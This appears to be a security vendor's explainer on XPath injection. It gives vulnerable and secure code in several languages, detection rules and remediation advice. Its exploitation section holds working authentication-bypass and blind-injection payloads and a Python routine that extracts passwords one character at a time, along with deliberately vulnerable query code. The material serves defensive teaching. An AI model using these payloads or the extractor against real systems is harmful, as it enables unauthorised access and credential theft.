What is XPath Injection?
XPath injection occurs when user-supplied input is embedded into an XPath query expression without proper encoding or parameterization. XPath is a query language for navigating XML documents, similar in concept to SQL for relational databases. When an application uses XPath to query an XML-based datastore (configuration files, user databases, SOAP services), unsanitized user input can alter the query logic.
Attackers can exploit XPath injection to bypass authentication (much like the classic ' OR '1'='1 SQL injection), to extract data from any part of the XML document (XPath has no access controls, so a query can reach every node), and, in blind scenarios, to enumerate the entire document structure character by character.
How exploitation works
A login form queries an XML user database:
String query = "//user[name/text()='" + username + "' and password/text()='" + password + "']";
An attacker enters ' or '1'='1 as both username and password:
//user[name/text()='' or '1'='1' and password/text()='' or '1'='1']
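Because and binds more tightly than or in XPath, the predicate is evaluated as name/text()='' or ('1'='1' and password/text()='') or '1'='1'. The final '1'='1' is always true, so the query selects every <user> node. The application sees a match (often treating the first node, typically the administrator, as the logged-in user), and authentication is bypassed entirely.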
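A minimal Python sketch, assuming the same query template as the login form above, reproduces the vulnerable concatenation so the resulting expression can be inspected directly. The function name build_login_query is illustrative only.

```python
def build_login_query(username: str, password: str) -> str:
    """Build the login query the vulnerable way: by string concatenation."""
    return ("//user[name/text()='" + username +
            "' and password/text()='" + password + "']")

# Benign input stays inside the quoted literals.
print(build_login_query("alice", "s3cret"))

# The payload closes the literal early and appends its own or-clauses.
payload = "' or '1'='1"
print(build_login_query(payload, payload))
```

The second call prints exactly the injected expression shown above, which is the point: nothing in string concatenation distinguishes data from query syntax.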
Blind XPath injection uses substring() and string-length() to extract node values one character at a time:
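username: ' or substring(//user[1]/password/text(),1,1)='a' or 'a'='b
password: x (any value)
Against the query above, the predicate becomes name/text()='' or substring(//user[1]/password/text(),1,1)='a' or 'a'='b' and password/text()='x'. The password check is ANDed only with the always-false 'a'='b', so it drops out, and the login succeeds exactly when the first character of the first user's password is a. Each attempt answers one yes/no question; iterating over positions and candidate characters, with string-length() supplying the length, recovers the whole value.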
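The character-by-character extraction described above is a simple search loop. The Python sketch below assumes a hypothetical oracle(condition) callable that submits wrap_condition(condition) as the username to the vulnerable login form and returns True when the login succeeds; wrap_condition, extract_value, the default charset, and max_len are all illustrative choices, not part of any tool. Candidate characters must not include ' because each guess is placed inside a single-quoted XPath literal.

```python
import string
from typing import Callable


def wrap_condition(condition: str) -> str:
    """Turn an XPath boolean test into a username payload for the login query.

    The payload ends with or 'a'='b, whose closing quote is supplied by the
    query itself; the query's password clause is then ANDed with the
    always-false 'a'='b' and drops out.
    """
    return "' or " + condition + " or 'a'='b"


def extract_value(oracle: Callable[[str], bool], target: str,
                  charset: str = string.ascii_letters + string.digits,
                  max_len: int = 64) -> str:
    """Recover the string value of the XPath expression `target`."""
    # Step 1: find the length with string-length().
    length = next((n for n in range(max_len + 1)
                   if oracle(f"string-length({target})={n}")), None)
    if length is None:
        raise ValueError("length not found within max_len")

    # Step 2: guess each character with substring(); XPath positions start at 1.
    value = ""
    for pos in range(1, length + 1):
        for ch in charset:
            if oracle(f"substring({target},{pos},1)='{ch}'"):
                value += ch
                break
        else:
            raise ValueError(f"no charset character matched at position {pos}")
    return value
```

A call such as extract_value(oracle, "//user[1]/password/text()") costs at most max_len + 1 requests for the length plus len(charset) requests per character; real tools often shrink this with binary search over character codes, but the linear loop keeps the idea visible.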
Vulnerable code examples
Java — XPath with user input
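import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.NodeList;

// VULNERABLE: User input directly embedded in XPath expression
// (xmlDoc is the parsed org.w3c.dom.Document holding the user records)
public boolean login(String username, String password) throws Exception {
    XPathFactory xpf = XPathFactory.newInstance();
    XPath xpath = xpf.newXPath();
    String expr = "//user[name='" + username + "' and password='" + password + "']";
    NodeList nodes = (NodeList) xpath.evaluate(expr, xmlDoc, XPathConstants.NODESET);
    return nodes.getLength() > 0;
}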
PHP — XPath query construction
// VULNERABLE: User input in XPath query
$xpath = new DOMXPath($doc);
$query = "//users/user[username='" . $_POST['username'] . "']";
$results = $xpath->query($query);
Secure code examples
Java — parameterized XPath with variable resolver
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathFactory;
import org.w3c.dom.NodeList;

// SECURE: Use XPath variable binding to separate query from data
// (xmlDoc is the parsed org.w3c.dom.Document holding the user records)
public boolean login(String username, String password) throws Exception {
    XPathFactory xpf = XPathFactory.newInstance();
    XPath xpath = xpf.newXPath();
    // Bind variables so user input is never concatenated into the expression;
    // $username and $password are resolved as values, not parsed as XPath.
    xpath.setXPathVariableResolver(variableName -> {
        if ("username".equals(variableName.getLocalPart())) return username;
        if ("password".equals(variableName.getLocalPart())) return password;
        return null;
    });
    String expr = "//user[name=$username and password=$password]";
    NodeList nodes = (NodeList) xpath.evaluate(expr, xmlDoc, XPathConstants.NODESET);
    return nodes.getLength() > 0;
}
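C# — XPathNavigator with allow-list validation
using System.Text.RegularExpressions;
using System.Xml.XPath;

// SECURE (allow-list): XPathNavigator has no simple variable-binding API
// (binding requires a custom XsltContext), so validate input strictly
// before it is embedded in the expression.
public bool Login(XPathNavigator nav, string username, string password)
{
    // Allow only expected characters; \z (unlike $) also rejects a trailing newline
    if (!Regex.IsMatch(username, @"^[a-zA-Z0-9_.-]{1,50}\z"))
        return false;
    if (!Regex.IsMatch(password, @"^[a-zA-Z0-9!@#$%^&*]{1,100}\z"))
        return false;
    // The username cannot contain a quote, and the password is embedded only as
    // its hash. HashPassword is the application's own helper (not shown); its
    // output (e.g. hex) must also be quote-free.
    string expr = $"//user[name='{username}' and password='{HashPassword(password)}']";
    return nav.SelectSingleNode(expr) != null;
}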
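Python — allow-list validation with XPath variables
import re
from lxml import etree

def login(xml_doc, username, password):
    # SECURE: strict allow-list validation, then XPath variable binding.
    # fullmatch (rather than match with ^...$) also rejects a trailing newline.
    if not re.fullmatch(r'[a-zA-Z0-9_\-\.]{1,50}', username):
        return False
    # hash_password is the application's own hashing helper (not shown)
    password_hash = hash_password(password)
    tree = etree.fromstring(xml_doc)
    # lxml passes keyword arguments to xpath() as XPath variables ($name,
    # $pw_hash), so the values are never parsed as part of the expression.
    # (Backslash escaping such as \' is not valid in XPath string literals.)
    result = tree.xpath("//user[name=$name and password_hash=$pw_hash]",
                        name=username, pw_hash=password_hash)
    return len(result) > 0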
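Allow-list patterns anchored with ^ and $ have one subtlety: in Python's re module, as in .NET (where \z is the strict alternative), $ also matches just before a final newline, so "alice\n" passes a ^...$ check. A trailing newline cannot break out of a quoted XPath literal, but a strict allow-list should still reject it. This sketch compares the two checks; the helper names and the pattern are illustrative.

```python
import re

# Allow-list: letters, digits, underscore, dot, hyphen; 1 to 50 characters.
PATTERN = r'[a-zA-Z0-9_.\-]{1,50}'


def allowed_with_dollar(value: str) -> bool:
    # ^...$ with re.match: $ also matches just before a final "\n"
    return re.match('^' + PATTERN + '$', value) is not None


def allowed_strict(value: str) -> bool:
    # fullmatch requires the entire string, newline included, to match
    return re.fullmatch(PATTERN, value) is not None


for candidate in ["alice", "alice\n", "alice' or '1'='1"]:
    print(repr(candidate), allowed_with_dollar(candidate), allowed_strict(candidate))
```

Both checks reject the quote-bearing payload; only the strict one also rejects the trailing newline.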
What Offensive360 detects
- String concatenation in XPath expressions — xpath.evaluate(), xpath.query(), or selectNodes() calls where the expression includes tainted data
- User input in XPath filter predicates — [field=' + userInput + '] patterns in XPath strings
- Missing variable binding — XPath evaluation without XPathVariableResolver or an equivalent parameterization mechanism
- Absence of input validation — No allow-list or format check before user input is used in XPath
Remediation guidance
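- Use XPath variable binding — Most XPath APIs support parameterized queries through bound variables (Java XPathVariableResolver, Saxon XdmValue parameters, keyword arguments to lxml's xpath()). Always prefer this over string concatenation.
- Apply strict allow-list validation — If parameterized queries are unavailable, restrict usernames, IDs, and other queried fields to known-safe character sets (alphanumeric, limited punctuation).
- Avoid storing auth data in XML — For authentication, use a relational or document database with proper parameterized query support rather than flat XML files.
- Escape quotes correctly at minimum — If neither parameterization nor allow-list validation is possible, encode each string value as a valid XPath literal. XPath 1.0 has no escape character: wrap the value in whichever quote type it does not contain, or build it with concat() when it contains both, e.g. concat('O', "'", 'Brien'). XPath 2.0 and later also accept a doubled quote ('') inside a single-quoted literal. Backslash escaping (\') is not valid in either version.
- Validate XML document structure — Validate XML datastores against an XSD schema so that content injected into the document itself (for example through XML injection when records are written) is rejected at parse time. This is defense in depth; it does not stop XPath injection in queries.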
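When neither variable binding nor an allow-list is available, the quote-handling fallback has to produce a valid XPath 1.0 literal. A minimal Python sketch of the usual approach (xpath_literal is an illustrative name, not a library function): use whichever quote character the value lacks, and fall back to concat() when it contains both.

```python
def xpath_literal(value: str) -> str:
    """Encode `value` as an XPath 1.0 string literal.

    XPath 1.0 has no escape character, so pick a delimiter the value does not
    contain, or splice the pieces together with concat() when it has both.
    """
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    # Contains both quote types: split on ' and rejoin with "'" pieces.
    # The result always has at least two arguments, as concat() requires.
    pieces = []
    for i, part in enumerate(value.split("'")):
        if i > 0:
            pieces.append('"\'"')
        if part:
            pieces.append("'" + part + "'")
    return "concat(" + ", ".join(pieces) + ")"


print(xpath_literal("alice"))
print(xpath_literal("O'Brien"))
print(xpath_literal('O\'Brien "Bob"'))
```

A query would then be built as "//user[name=" + xpath_literal(username) + "]". This is a last resort: variable binding keeps data out of the expression entirely, whereas this helper only makes concatenation safe if it is applied to every value without exception.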